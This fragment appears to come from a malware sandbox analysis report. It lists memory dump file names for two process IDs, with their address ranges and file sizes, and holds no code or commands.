                                                                • memory/2248-121-0x0000000001024000-0x0000000001027000-memory.dmp

                                                                  Filesize

                                                                  12KB

                                                                • memory/2248-123-0x000000000102B000-0x000000000104A000-memory.dmp

                                                                  Filesize

                                                                  124KB

                                                                • memory/2800-131-0x0000000000100000-0x0000000000120000-memory.dmp

                                                                  Filesize

                                                                  128KB

                                                                • memory/2800-132-0x0000000140000000-0x00000001407F4000-memory.dmp

                                                                  Filesize

                                                                  8.0MB